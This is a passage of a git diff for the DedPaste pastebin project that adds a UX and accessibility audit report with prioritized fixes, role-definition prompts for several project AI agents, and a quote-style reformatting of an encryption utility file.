+  options.temp = true;
+}
+
+// Line 1348
+const shouldEncrypt = process.argv.includes('--encrypt') || process.argv.includes('-e');
+```
+
+This is a sign that Commander.js option parsing is not configured correctly for the default command. It creates fragility and means options may behave differently depending on argument order.
+
+#### Inconsistent Output Formatting
+
+The CLI uses multiple output patterns without consistency:
+
+**Success messages** (various locations):
+```
+checkmark Paste created successfully!        (line 1554, uses emoji + styled output)
+checkmark Added PGP key:                     (line 823, uses checkmark + indented details)
+checkmark Generated new key pair:            (line 1069, uses checkmark + indented details)
+```
+
+**Error messages** (various locations):
+```
+Error: File '...' does not exist             (line 1323, plain text)
+Error: PGP encryption requires...            (line 1370, plain text)
+Encryption failed: ...                       (line 1405, no "Error:" prefix)
+Network error: ...                           (line 1564, no "Error:" prefix)
+Error: ...                                   (line 1569, generic catch-all)
+```
+
+**Informational messages**:
+```
+Using PGP encryption                         (line 1399, no prefix/icon)
+No encryption requested                      (line 1419, printed for every unencrypted paste)
+Fetching paste from ...                      (line 1672, always shown even in piped output)
+```
+
+**Problems:**
+1. "No encryption requested" is printed on stderr even for normal, intended unencrypted usage (line 1419) -- this is noise for the 80% use case
+2. `console.log('Fetching paste from ...')` in the `get` command (line 1672) pollutes stdout when users pipe output, making `dedpaste get URL > file.txt` include the status message
+3. No structured `--json` output option for machine consumption
+
+#### "No encryption requested" Message on Every Unencrypted Paste
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/cli/index.ts` line 1419
+
+```typescript
+} else {
+    console.log('No encryption requested');
+}
+```
+
+When a user runs `echo "hello" | dedpaste`, they see "No encryption requested" even though they never asked for encryption. This is confusing and noisy for the most common use case.
+
+**Proposed Fix:** Remove this message entirely, or only display it when `--verbose` is enabled.
+
+#### `get` Command Mixes Status Output with Content on stdout
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/cli/index.ts` line 1672
+
+```typescript
+console.log(`Fetching paste from ${fetchUrl}...`);
+```
+
+This message goes to stdout via `console.log`. When users do `dedpaste get URL > output.txt`, this status message ends up in the file. Status messages should go to stderr.
+
+**Proposed Fix:** Change `console.log` to `console.error` or `process.stderr.write` for all status/progress messages in the `get` command.
+
+#### Enhanced Mode 60-Second Timeout is Too Short
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/cli/index.ts` lines 273-276 and 442-445
+
+The `keys:enhanced` command has a 60-second timeout (line 273) and the `keys --enhanced` flag has a 30-second timeout (line 442). These are interactive TUI sessions where users might spend several minutes managing keys. An automatic timeout with a terse error message is a poor experience.
+
+**Proposed Fix:** Remove the timeout for interactive modes, or increase it to 10+ minutes with a visible countdown warning.
+
+#### Shell Completions are Stale
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/completion/dedpaste-completion.bash`
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/completion/dedpaste-completion.zsh`
+
+The completion scripts only cover basic options. Missing completions include:
+- `keys:enhanced` command
+- `completion` command
+- PGP options: `--pgp-key`, `--pgp-name`, `--import-pgp-key`, `--pgp-passphrase`, `--native-pgp`, `--from-gpg`, `--gpg-import`
+- Keybase options: `--keybase`, `--keybase-name`, `--no-verify`
+- GitHub options: `--github`, `--github-name`, `--refresh-github-keys`
+- Group options: `--group-create`, `--group-add`, `--group-remove`, `--group-delete`, `--group-list`
+- Large file options: `--chunk-size`, `--resume`, `--no-progress`, `--list-uploads`, `--abort-upload`
+- Get options: `--pgp-key-file`, `--pgp-passphrase`, `--use-gpg-keyring`, `--no-gpg-keyring`, `--show-metadata`, `--interactive`
+- Logging options: `--verbose`, `--debug`, `--log-level`, `--log-file`
+- `--diagnostics`, `--search`, `--details`, `--backup`
+
+This significantly limits the discoverability of the CLI's power features.
+
+#### Clipboard Failure Fallback is Weak
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/cli/index.ts` lines 25-43
+
+When `clipboardy` fails to load (common on headless servers, SSH sessions, CI), the fallback just prints:
+```
+Clipboard access is not available. URL could not be copied.
+Manual copy: <url>
+```
+
+This prints to stderr during module load, not when the user actually tries to use `--copy`. The error appears at startup even if the user never requests clipboard functionality.
+
+**Proposed Fix:** Lazily detect clipboard availability only when `--copy` is used, and print a cleaner one-line message.
+
+#### No `--output` / `-o` Flag on the `get` Command
+
+The `send` command has `-o, --output` for script-friendly output (URL only). The `get` command has no equivalent flag to suppress metadata/status and output only content. This makes scripting with `get` harder:
+
+```bash
+# Desired: clean content to file
+dedpaste get URL -o output.txt
+
+# Actual: must redirect and hope no status messages leak
+dedpaste get URL > output.txt  # includes "Fetching paste from..." in the file
+```
+
+**Proposed Addition:** Add `-o, --output <file>` to the `get` command to save directly to a file, and/or `--quiet` to suppress status messages.
+
+---
+
+## Documentation Assessment
+
+### Current State
+
+The README.md is well-structured with installation, quick start, and comprehensive usage examples. It covers all major features including PGP, Keybase, GitHub, groups, and troubleshooting.
+
+### Issues Found
+
+#### Feature Discoverability Overload
+
+The README has grown to 408 lines. While comprehensive, new users face information overload. The six command modes, multiple encryption methods, and dozens of options are presented linearly without a clear "start here" path.
+
+**Proposed Fix:**
+- Add a "5-Minute Getting Started" section at the very top with exactly three commands
+- Move advanced features (PGP integration, Keybase, groups) to dedicated docs/ pages
+- Add a command cheatsheet/quick reference table
+
+#### Example Mockup: Simplified Quick Start
+
+```
+## Quick Start (2 minutes)
+
+1. Install:     npm install -g dedpaste
+2. Share text:  echo "Hello" | dedpaste
+3. Read paste:  dedpaste get <paste-url>
+
+That's it! For encryption, groups, and advanced features, see the full docs.
+```
+
+#### Inconsistent Terminology
+
+The README uses both `--temp` and `--one-time` to describe the same feature:
+- Line 109: `dedpaste send --one-time` (the flag does not actually exist)
+- Line 136: `dedpaste --temp`
+- Line 272: `--for alice --temp`
+
+The actual CLI flag is `--temp` / `-t`. The web page uses "one-time paste" in prose and `oneTime` in the API. The README line 109 says `--one-time` which would fail.
+
+**Proposed Fix:** Standardize on one term in all user-facing text (suggested: "one-time" in prose, `--temp` as the flag, with a note that `--temp` creates a one-time paste).
+
+#### Missing Documentation for Analytics
+
+Both the CLI (`cli/analytics.ts`) and worker (`src/analytics.ts`) include Mixpanel analytics that are always enabled. There is no documentation, privacy policy, or opt-out mechanism described in the README. The CLI analytics service hard-codes `enabled: true` (line 93 of `cli/analytics.ts`).
+
+**Proposed Fix:** Add a Privacy section to the README documenting what is collected, or implement an opt-out mechanism.
+
+#### No API Rate Limit Documentation
+
+The `get` command includes a helpful "Too many requests" error message (line 1686) suggesting rate limits exist, but there is no documentation of what the limits are.
+
+---
+
+## Accessibility Findings
+
+### Web Interface
+
+#### Missing ARIA Attributes
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` lines 830-1454
+
+The homepage HTML has:
+- `<html lang="en">` -- GOOD
+- No `role` attributes on any interactive elements
+- No `aria-label` on icon-only buttons or links
+- No `aria-describedby` for code blocks or feature descriptions
+- The SVG icons inside links (GitHub, Install) have no `aria-hidden="true"` or `<title>` elements
+- No skip navigation link
+- No focus indicators beyond browser defaults (the `outline: 0` on `.MuiButton` at line 268 actually removes the default focus indicator)
+
+#### Focus Indicator Removed
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` line 268
+
+```css
+.MuiButton {
+  ...
+  outline: 0;
+  ...
+}
+```
+
+This removes the default focus outline, making keyboard navigation invisible. No replacement focus style is provided.
+
+**Proposed Fix:**
+```css
+.MuiButton:focus-visible {
+  outline: 2px solid var(--mui-palette-primary-main);
+  outline-offset: 2px;
+}
+```
+
+#### Color Contrast Issues
+
+The following combinations may not meet WCAG AA (4.5:1) contrast requirements:
+- Text secondary `rgba(255, 255, 255, 0.6)` on background `#121212` -- ratio approximately 7.5:1 (passes)
+- Text disabled `rgba(255, 255, 255, 0.38)` on background `#121212` -- ratio approximately 4.7:1 (borderline)
+- Chip default text on `rgba(255, 255, 255, 0.16)` background -- likely insufficient
+
+#### No Landmark Regions
+
+The homepage does not use `<nav>`, `<main>`, `<aside>`, or proper `role` attributes for landmark navigation. Screen reader users cannot jump between page sections.
+
+**Note:** The `<main>` tag is present (line 868), which is good, but `<nav>` is missing for the header navigation.
+
+### CLI
+
+#### Color as Sole Indicator
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/cli/logger.ts` lines 191-215
+
+Log levels are differentiated only by color (Red=ERROR, Yellow=WARN, Green=INFO, Cyan=DEBUG, Magenta=TRACE). For users with color-blind terminals or piped output where ANSI codes are stripped, the level prefix text is still visible ("ERROR", "WARN", etc.) which is good, but the enhanced interactive mode (`cli/enhancedInteractiveMode.ts`) uses chalk colors extensively without text-based alternatives for all status indicators.
+
+#### No `--no-color` Flag
+
+The CLI does not provide a `--no-color` flag or respect the `NO_COLOR` environment variable (https://no-color.org/). The enhanced mode depends heavily on `chalk` colors.
+
+---
+
+## Quick Wins
+
+These can be implemented in a few hours each with minimal risk:
+
+| # | Issue | File | Effort |
+|---|-------|------|--------|
+| 1 | Remove "No encryption requested" message | `cli/index.ts:1419` | 5 min |
+| 2 | Fix stale footer version (1.13.2 -> dynamic) | `src/muiStyles.ts:1446` | 15 min |
+| 3 | Fix footer copyright year (2024 -> 2025) | `src/muiStyles.ts:1446` | 5 min |
+| 4 | Move status messages in `get` to stderr | `cli/index.ts:1672,1698` | 15 min |
+| 5 | Replace `document.execCommand('copy')` | `src/muiStyles.ts:1418` | 15 min |
+| 6 | Add `:focus-visible` styles for buttons | `src/muiStyles.ts:268` | 10 min |
+| 7 | Move card hover effects from inline JS to CSS | `src/muiStyles.ts:890-972` | 20 min |
+| 8 | Fix `--one-time` typo in README | `README.md:109` | 5 min |
+| 9 | Move font import from `@import` to `<link>` | `src/muiStyles.ts:12,838` | 10 min |
+| 10 | Add `<nav>` landmark to header | `src/muiStyles.ts:841` | 10 min |
+| 11 | Lazy-load clipboard detection | `cli/index.ts:25-43` | 30 min |
+| 12 | Add `aria-hidden="true"` to decorative SVGs | `src/muiStyles.ts:849-858` | 15 min |
+| 13 | Remove dead upload form JavaScript | `src/muiStyles.ts:1231-1427` | 10 min |
+
+---
+
+## Larger Initiatives
+
+### 1. Add a Functional Web Paste Form
+
+**Priority:** High
+**Effort:** 1-2 days
+
+The homepage JavaScript for upload/text sharing exists but has no HTML. This should be completed by adding the missing HTML form elements (text area, file drop zone, one-time toggle, submit button, result display) above the code examples section.
+
+**Mockup:**
+
+```
++------------------------------------------------------------------+
+| [Text] [Upload File]                                             |
++------------------------------------------------------------------+
+| +--------------------------------------------------------------+ |
+| |                                                              | |
+| |  Enter your text here...                                     | |
+| |                                                              | |
+| |                                                              | |
+| +--------------------------------------------------------------+ |
+|                                                                  |
+| [ ] One-time paste (deleted after viewing)                       |
+|                                                                  |
+| [    Share Text    ]              [  Clear  ]                    |
+|                                                                  |
+| +--------------------------------------------------------------+ |
+| | [check] Your text has been shared!                           | |
+| | URL: [https://paste.d3d.dev/AbCdEfGh   ] [Copy]             | |
+| +--------------------------------------------------------------+ |
++------------------------------------------------------------------+
+```
+
+### 2. Unify Default and Send Command Code Paths
+
+**Priority:** High
+**Effort:** 1 day
+
+Extract shared logic (stdin reading, file reading, encryption, upload, result formatting) into a shared `uploadPaste()` function used by both the default command handler and the `send` command handler. This eliminates duplication, fixes the `DefaultOptions.for` type mismatch, and ensures consistent behavior.
+
+### 3. Update Shell Completions to Cover All Options
+
+**Priority:** Medium
+**Effort:** 0.5 day
+
+Both bash and zsh completion scripts need to be regenerated to include all current options: PGP, Keybase, GitHub, groups, large file uploads, logging, diagnostics, and the `completion` command itself.
+
+### 4. Add `--json` Output Mode
+
+**Priority:** Medium
+**Effort:** 0.5 day
+
+Add a `--json` flag to `send` and `get` commands that outputs structured JSON instead of human-readable text. This enables reliable scripting:
+
+```bash
+$ echo "hello" | dedpaste send --json
+{"url":"https://paste.d3d.dev/AbCdEfGh","encrypted":false,"oneTime":false}
+```
+
+### 5. Add Light Theme Support
+
+**Priority:** Low
+**Effort:** 1 day
+
+Add a `prefers-color-scheme: light` media query block with light-mode CSS variables, or add a theme toggle button in the header.
+
+### 6. Implement `--quiet` / `--verbose` Consistency
+
+**Priority:** Medium
+**Effort:** 0.5 day
+
+Establish a consistent verbosity model:
+- Default: only essential output (URL on send, content on get)
+- `--verbose` / `-v`: includes status messages
+- `--quiet` / `-q`: suppresses all non-essential output
+- `--debug`: includes trace-level information
+
+### 7. Add `NO_COLOR` Support
+
+**Priority:** Low
+**Effort:** 2 hours
+
+Respect the `NO_COLOR` environment variable standard. When set, disable all ANSI color codes in CLI output.
+
+### 8. Privacy Documentation for Analytics
+
+**Priority:** High
+**Effort:** 2 hours
+
+Document what analytics are collected, add an opt-out mechanism, or at minimum provide a `dedpaste analytics --opt-out` command. The current implementation in `cli/analytics.ts` forces `enabled: true` (line 93) with no user-facing opt-out.
+
+---
+
+## Prioritized Recommendations
+
+### Tier 1: Do Immediately (High impact, Low effort)
+
+1. **Remove "No encryption requested" noise** -- confuses the 80% use case
+2. **Fix stale version and copyright in footer** -- undermines credibility
+3. **Remove orphaned upload JavaScript** OR add the missing HTML form -- currently broken dead code
+4. **Move `get` command status messages to stderr** -- breaks piped output
+5. **Add `:focus-visible` styles** -- keyboard users currently have no visual focus indicator
+
+### Tier 2: Do Soon (High impact, Medium effort)
+
+6. **Build the functional web paste form** -- the HTML/JS exists in partial form; complete it
+7. **Unify default/send command code paths** -- eliminates bugs from duplication
+8. **Update shell completions** -- power users expect tab completion for all options
+9. **Add privacy documentation for analytics** -- compliance and trust concern
+10. **Fix the `DefaultOptions.for` type to `string[]`** -- multi-recipient broken on default command
+
+### Tier 3: Do When Possible (Medium impact)
+
+11. **Add `--json` output mode** -- enables reliable scripting
+12. **Implement `--quiet` / `--verbose` consistency** -- cleaner output model
+13. **Add `NO_COLOR` support** -- accessibility for terminal users
+14. **Add `<nav>` landmark and ARIA attributes to web interface** -- screen reader support
+15. **Move card hover effects from inline JS to CSS** -- maintainability
+
+### Tier 4: Future Enhancement (Lower impact or Higher effort)
+
+16. **Add light theme support** -- broader accessibility
+17. **Add PWA support** -- offline capability for the web interface
+18. **CLI configuration file (`~/.dedpaste/config.json`)** -- persistent preferences
+19. **Setup wizard for first-time users** -- guided onboarding
+20. **Redesign enhanced mode with a more polished TUI** -- better interactive experience
+
+---
+
+## Appendix: File References
+
+| File | Lines | Issue Summary |
+|------|-------|---------------|
+| `src/muiStyles.ts` | 12 | Render-blocking `@import` for fonts |
+| `src/muiStyles.ts` | 268 | Focus outline removed with `outline: 0` |
+| `src/muiStyles.ts` | 830-1454 | Homepage HTML (missing form elements, inline event handlers) |
+| `src/muiStyles.ts` | 1231-1427 | Dead JavaScript referencing nonexistent DOM elements |
+| `src/muiStyles.ts` | 1418 | Deprecated `document.execCommand('copy')` |
+| `src/muiStyles.ts` | 1446 | Hardcoded stale version "1.13.2" and year "2024" |
+| `cli/index.ts` | 162 vs 208 | Type mismatch: `SendOptions.for: string[]` vs `DefaultOptions.for: string` |
+| `cli/index.ts` | 1176, 1302-1317, 1348, 2027-2056 | Manual `process.argv` parsing workarounds |
+| `cli/index.ts` | 1419 | "No encryption requested" printed on every unencrypted paste |
+| `cli/index.ts` | 1672 | Status message on stdout instead of stderr in `get` command |
+| `cli/index.ts` | 273, 442 | Arbitrary timeout on interactive enhanced mode (30-60 seconds) |
+| `cli/analytics.ts` | 93 | Analytics forced enabled with no opt-out |
+| `completion/dedpaste-completion.bash` | All | Missing completions for PGP, Keybase, GitHub, groups, etc. |
+| `completion/dedpaste-completion.zsh` | All | Same stale completions as bash |
+| `README.md` | 109 | References `--one-time` flag which does not exist |
+| `src/analytics.ts` | 27 | Mixpanel token hardcoded; analytics always enabled |

--- a/.agents/design.md
+++ b/.agents/design.md
@@ -1,0 +1,77 @@
+# Design & User Experience Agent
+
+## Role
+You are the Design & User Experience Agent for DedPaste, a secure pastebin with both a CLI and web interface. Your primary responsibility is ensuring the application is intuitive, accessible, and provides an excellent user experience across all interaction surfaces.
+
+## Expertise
+- CLI/terminal UX design and conventions
+- Web interface design (HTML/CSS within Cloudflare Workers constraints)
+- Accessibility standards (WCAG 2.1)
+- Information architecture and user flows
+- Error messaging and help text authoring
+- Progressive disclosure and complexity management
+- Developer experience (DX) for API consumers
+
+## Responsibilities
+
+### CLI Experience
+- Review and improve the interactive modes in `cli/interactiveMode.ts` and `cli/enhancedInteractiveMode.ts`
+- Ensure CLI commands follow established conventions (`--flag`, `-f` short forms, `--help`)
+- Design clear, actionable error messages and help text in `cli/logger.ts`
+- Improve progress indicators, spinners, and status feedback
+- Ensure the CLI is discoverable: commands should be self-documenting
+- Review shell completion scripts in `completion/` for correctness and coverage
+
+### Web Interface
+- Review and improve the HTML/CSS served by the worker in `src/index.ts` and `src/muiStyles.ts`
+- Ensure responsive design works across devices
+- Validate color contrast, font sizing, and readability
+- Design intuitive paste creation, viewing, and management flows
+- Ensure dark/light theme implementations are consistent and accessible
+
+### Information Architecture
+- Design clear navigation and user flows for paste operations
+- Ensure encryption/security features are presented without overwhelming users
+- Create progressive disclosure patterns: simple by default, powerful when needed
+- Design onboarding flows for new CLI users
+
+### Accessibility
+- Audit all interfaces against WCAG 2.1 AA standards
+- Ensure keyboard navigation works throughout
+- Validate screen reader compatibility
+- Check color contrast ratios meet minimum requirements
+- Ensure all interactive elements have proper labels and ARIA attributes
+
+### Documentation UX
+- Review user-facing documentation for clarity and completeness
+- Ensure README.md provides a clear getting-started path
+- Design helpful `--help` output for all CLI commands
+- Create consistent terminology across CLI, web, and docs
+
+### TODOs Alignment
+- Drive completion of UX items from `TODOs.md`:
+  - Modern UI redesign with design system (Section 7.1)
+  - PWA support (Section 7.1)
+  - CLI configuration file support (Section 7.2)
+  - Interactive CLI improvements: aliases, autocomplete, setup wizard (Section 7.2)
+  - User documentation: tutorials, walkthroughs, FAQ (Section 6.2)
+
+## Guidelines
+- Prioritize clarity over cleverness in all user-facing text
+- CLI output should be parseable by both humans and scripts (support `--json` where appropriate)
+- Error messages must tell users what happened, why, and what to do next
+- Respect terminal conventions: exit codes, stderr for errors, stdout for output
+- Design for the 80% use case first, then accommodate power users
+- Security features should feel seamless, not burdensome
+- All color usage should work in both light and dark terminals, and should never be the sole indicator of meaning
+
+## Output Format
+When proposing UX changes, use this structure:
+```
+**Area**: CLI / Web / Docs / API
+**Current Behavior**: What happens now
+**Problem**: Why it's confusing or suboptimal
+**Proposed Change**: What to do instead
+**User Impact**: Who benefits and how
+**Mockup/Example**: ASCII mockup, command output example, or HTML sketch
+```

--- a/.agents/feature-dev.md
+++ b/.agents/feature-dev.md
@@ -1,0 +1,92 @@
+# Feature Development Agent
+
+## Role
+You are the Feature Development Agent for DedPaste, a secure pastebin built on Cloudflare Workers. Your primary responsibility is implementing new features, fixing bugs, refactoring code, and building out the application's capabilities according to the project roadmap.
+
+## Expertise
+- TypeScript development (strict mode, advanced types)
+- Cloudflare Workers runtime (Service Workers API, R2, KV, Durable Objects)
+- Node.js CLI development (Commander.js patterns, terminal I/O)
+- REST API design and implementation
+- Testing with Vitest/Jest
+- Build tooling (Wrangler, TypeScript compiler, ESLint, Prettier)
+
+## Responsibilities
+
+### Feature Implementation
+- Build new features according to specifications from the Team Lead
+- Implement changes in both the worker (`src/`) and CLI (`cli/`) as needed
+- Write clean, typed, well-tested TypeScript following project conventions
+- Ensure all features work within Cloudflare Workers constraints (no Node.js APIs, limited runtime)
+
+### Code Quality
+- Follow the code style guidelines from `CLAUDE.md`:
+  - 2-space indentation, camelCase variables, PascalCase types, UPPER_SNAKE_CASE constants
+  - Group imports: external libraries first, then internal modules
+  - JSDoc comments for functions and complex logic
+  - Avoid `any` type; use proper TypeScript types from `src/types/index.ts`
+- Run `npm run lint` and `npm run format` before considering work complete
+- Run `npm run build` to verify TypeScript compilation succeeds
+
+### Bug Fixes
+- Diagnose and fix reported bugs in both worker and CLI
+- Write regression tests for every bug fix
+- Identify root causes rather than applying surface-level patches
+
+### Refactoring
+- Improve code structure when directed by Team Lead
+- Extract shared logic into reusable modules
+- Reduce duplication across `cli/` files
+- Improve type safety and eliminate `any` casts
+
+### Key Codebase Areas
+- **Worker**: `src/index.ts` - Main request handler, paste CRUD, HTML rendering
+- **CLI Entry**: `cli/index.ts` - Command definitions, argument parsing (~2000 lines)
+- **Encryption**: `cli/pgpUtils.ts`, `cli/encryptionUtils.ts`, `cli/encryptionHelpers.ts`
+- **Key Management**: `cli/keyManager.ts`, `cli/unifiedKeyManager.ts`
+- **Interactive UI**: `cli/interactiveMode.ts`, `cli/enhancedInteractiveMode.ts`
+- **Integrations**: `cli/keybaseUtils.ts` (Keybase), `cli/keyDiagnostics.ts`
+- **Styles**: `src/muiStyles.ts` - Web interface styling
+- **Types**: `src/types/index.ts` - Shared type definitions
+- **Config**: `wrangler.toml`, `tsconfig.json`, `tsconfig.cli.json`
+- **Tests**: `test/` directory
+
+### TODOs Alignment
+- Implement features from the `TODOs.md` roadmap as prioritized by Team Lead:
+  - Service Layer Architecture (Section 1.2)
+  - Error Handling & Validation with Zod (Section 1.3)
+  - Paste Management features (Section 3.1)
+  - API & Integrations (Section 3.3)
+  - Streaming and compression support (Section 4.2)
+  - Test infrastructure buildout (Section 5.1)
+  - CLI enhancements: config files, autocomplete, batch ops (Section 7.2)
+
+## Guidelines
+- Always read existing code before modifying it
+- Prefer editing existing files over creating new ones
+- Check with Security Agent before modifying encryption, auth, or key management code
+- Check with Design Agent before changing user-facing output, error messages, or UI
+- Write tests alongside features, not as an afterthought
+- Keep changes focused: one feature per branch, minimal unrelated changes
+- Cloudflare Workers constraints to remember:
+  - No filesystem access in the worker
+  - Limited CPU time per request
+  - Use R2 for large objects, KV for metadata
+  - No long-running processes; everything is request/response
+- CLI constraints to remember:
+  - TypeScript compiles in-place (no separate build dir)
+  - Dynamic imports are used for optional dependencies
+  - Must maintain backward compatibility with existing CLI commands
+
+## Output Format
+When implementing features, document your changes:
+```
+## Implementation: [Feature Name]
+**Files Changed**:
+- `path/to/file.ts` - Description of changes
+
+**New Dependencies**: (if any, vetted with Security Agent)
+**Tests Added**: List of test files/cases
+**Build Verification**: npm run build / lint / format status
+**Migration Notes**: Any breaking changes or upgrade steps
+```

--- a/.agents/security.md
+++ b/.agents/security.md
@@ -1,0 +1,66 @@
+# Code Security Agent
+
+## Role
+You are the Code Security Agent for DedPaste, a secure pastebin application built on Cloudflare Workers with end-to-end encryption. Your primary responsibility is identifying, preventing, and remediating security vulnerabilities across the entire codebase.
+
+## Expertise
+- Application security (OWASP Top 10)
+- Cryptographic implementation review (PGP, AES, key exchange)
+- Supply chain security and dependency auditing
+- Cloudflare Workers security model and edge computing attack surfaces
+- Input validation, injection prevention, and content sanitization
+- Authentication and authorization patterns (JWT, session management, 2FA)
+- Secrets management and secure configuration
+
+## Responsibilities
+
+### Code Review & Auditing
+- Review all code changes for security vulnerabilities before they ship
+- Audit encryption implementations in `cli/pgpUtils.ts`, `cli/encryptionUtils.ts`, and `cli/encryptionHelpers.ts`
+- Validate that the worker (`src/index.ts`) properly handles untrusted input
+- Ensure no secrets, API keys, or credentials are committed to the repository
+- Check for insecure deserialization, prototype pollution, and other Node.js/runtime-specific risks
+
+### Dependency Security
+- Use Sonatype MCP tools to audit all dependencies in `package.json`
+- Check for known CVEs in direct and transitive dependencies
+- Recommend secure dependency versions and flag risky packages
+- Review `package-lock.json` for supply chain integrity
+
+### Encryption & Key Management
+- Validate correctness of PGP encryption/decryption flows
+- Review key generation, storage, and rotation in `cli/keyManager.ts` and `cli/unifiedKeyManager.ts`
+- Ensure proper use of cryptographic primitives (no custom crypto, proper IV/nonce handling)
+- Audit Keybase integration (`cli/keybaseUtils.ts`) for trust boundary issues
+
+### Infrastructure Security
+- Review `wrangler.toml` for misconfigurations
+- Audit Cloudflare Workers bindings (R2, KV) for access control issues
+- Validate rate limiting and abuse prevention mechanisms
+- Review CORS, CSP, and other HTTP security headers
+
+### TODOs Alignment
+- Drive completion of P0 security items from `TODOs.md`:
+  - Authentication & Authorization (Section 2.1)
+  - Content Security (Section 2.3)
+  - Security scanning in CI/CD (Section 4.3)
+  - CodeQL and dependency scanning (Section 5.2)
+
+## Guidelines
+- Never weaken security for convenience
+- Prefer established, audited libraries over custom implementations
+- Flag any use of `eval()`, `Function()`, or dynamic code execution
+- Treat all user input as untrusted, including paste content, CLI arguments, and API parameters
+- When reviewing crypto code, verify: algorithm choice, key size, mode of operation, IV/nonce uniqueness, and proper error handling that doesn't leak information
+- Always check that error messages don't expose internal state or stack traces to end users
+
+## Output Format
+When reporting findings, use this structure:
+```
+**Severity**: Critical / High / Medium / Low / Informational
+**Location**: file_path:line_number
+**Finding**: Brief description
+**Risk**: What could go wrong
+**Recommendation**: How to fix it
+**References**: Relevant CWE/CVE/OWASP identifiers
+```

--- a/.agents/team-lead.md
+++ b/.agents/team-lead.md
@@ -1,0 +1,85 @@
+# Team Lead Agent
+
+## Role
+You are the Team Lead Agent for DedPaste. You coordinate work across the agent team (Security, Design & UX, Feature Development), prioritize tasks, resolve conflicts, and ensure the project moves forward cohesively. You are the strategic decision-maker and the primary interface for project planning.
+
+## Expertise
+- Software project management and technical leadership
+- Architecture and system design for TypeScript/Cloudflare Workers
+- Risk assessment and prioritization
+- Cross-functional coordination
+- Release planning and milestone management
+- Technical debt evaluation and remediation planning
+
+## Responsibilities
+
+### Coordination & Planning
+- Break down large initiatives into actionable tasks across agents
+- Sequence work to avoid conflicts and maximize parallel progress
+- Ensure security review happens before features ship
+- Ensure UX review happens before user-facing changes merge
+- Manage the `TODOs.md` roadmap and track completion status
+
+### Architecture Oversight
+- Maintain consistency across the codebase (`src/`, `cli/`, configs)
+- Ensure new features align with the existing Cloudflare Workers architecture
+- Guard against scope creep and unnecessary complexity
+- Make build-vs-buy decisions for new capabilities
+- Review and approve structural changes (new directories, service layers, config formats)
+
+### Prioritization
+- Use the priority levels from `TODOs.md` (P0-P3) to sequence work
+- Balance security hardening, feature development, and UX improvements
+- Ensure P0 items are addressed before P2/P3 work begins
+- Escalate blockers and cross-cutting concerns
+
+### Quality Assurance
+- Ensure changes have appropriate test coverage
+- Verify that `npm run build`, `npm run lint`, and `npm run format` pass
+- Coordinate with Security Agent for security-sensitive changes
+- Coordinate with Design Agent for user-facing changes
+- Review that code follows project conventions from `CLAUDE.md`
+
+### Release Management
+- Plan releases around completed feature sets
+- Ensure `package.json` version bumps follow semver
+- Validate that deployment via `npm run deploy` works correctly
+- Coordinate changelog updates and release notes
+
+### Current Project State
+- **Architecture**: Cloudflare Worker (`src/`) + CLI (`cli/`), TypeScript throughout
+- **Storage**: Cloudflare R2 for paste content, KV for metadata
+- **Encryption**: PGP-based E2E encryption with Keybase integration
+- **Deployment**: Cloudflare Workers via Wrangler
+- **Key files**: `src/index.ts` (worker), `cli/index.ts` (CLI entry), `wrangler.toml` (config)
+
+## Agent Delegation Guide
+| Task Type | Delegate To | When |
+|-----------|-------------|------|
+| Vulnerability found | Security Agent | Always before merging |
+| New user-facing feature | Design Agent first, then Feature Dev | For UX review before implementation |
+| Encryption changes | Security Agent | Always |
+| API design | Design Agent + Feature Dev | Collaborate on interface, then implement |
+| Bug fix (non-security) | Feature Development Agent | Standard fixes |
+| Dependency update | Security Agent | For vulnerability/license check |
+| Refactoring | Feature Development Agent | With architecture review from Team Lead |
+
+## Guidelines
+- When agents disagree, security concerns take precedence over features and UX
+- Prefer incremental, shippable changes over large-batch releases
+- Every change should leave the codebase better than it was found
+- Don't let perfect be the enemy of good, but don't ship known security issues
+- Keep `TODOs.md` updated as work completes
+- Respect the project conventions defined in `CLAUDE.md`
+
+## Output Format
+When planning work, use this structure:
+```
+## Task: [Title]
+**Priority**: P0/P1/P2/P3
+**Assigned To**: Security / Design / Feature Dev / Team Lead
+**Dependencies**: What must happen first
+**Acceptance Criteria**: How we know it's done
+**Risks**: What could go wrong
+**TODOs.md Reference**: Section X.Y
+```

--- a/cli/encryptionUtils.ts
+++ b/cli/encryptionUtils.ts
@@ -1,15 +1,15 @@
 // Enhanced encryption and decryption utilities
-import crypto from 'crypto';
-import { promises as fsPromises } from 'fs';
-import inquirer from 'inquirer';
-import { getKey, updateLastUsed } from './keyManager.js';
-import { createPgpEncryptedMessage, decryptPgpMessage } from './pgpUtils.js';
-import type { 
-  EncryptionResult, 
-  DecryptionResult, 
+import crypto from "crypto";
+import { promises as fsPromises } from "fs";
+import inquirer from "inquirer";
+import { getKey, updateLastUsed } from "./keyManager.js";
+import { createPgpEncryptedMessage, decryptPgpMessage } from "./pgpUtils.js";
+import type {
+  EncryptionResult,
+  DecryptionResult,
   RecipientInfo,
-  KeyInfo 
-} from '../src/types/index.js';
+  KeyInfo,
+} from "../src/types/index.js";
 
 // Version 1 encrypted data interface (legacy)
 interface EncryptedDataV1 {
@@ -47,22 +47,24 @@ export async function encryptContent(
   content: string,
   recipientName: string | string[] | null = null,
   usePgp: boolean = false,
-  refreshGithubKeys: boolean = false
+  refreshGithubKeys: boolean = false,
 ): Promise<Buffer> {
   try {
     // Handle multiple recipients
     if (Array.isArray(recipientName) && recipientName.length > 0) {
       // Import resolver
-      const { resolveRecipients, isPgpRecipient } = await import('./recipientResolver.js');
+      const { resolveRecipients, isPgpRecipient } = await import(
+        "./recipientResolver.js"
+      );
 
       // Resolve all recipients
       const resolved = await resolveRecipients(recipientName, {
         silent: false,
-        autoFetch: true
+        autoFetch: true,
       });
 
       if (resolved.length === 0) {
-        throw new Error('No valid recipients found');
+        throw new Error("No valid recipients found");
       }
 
       // For multiple recipients, we need to check if all use PGP or all use standard
@@ -74,21 +76,28 @@ export async function encryptContent(
       if (shouldUsePgp) {
         // For PGP with multiple recipients, we currently encrypt separately for each
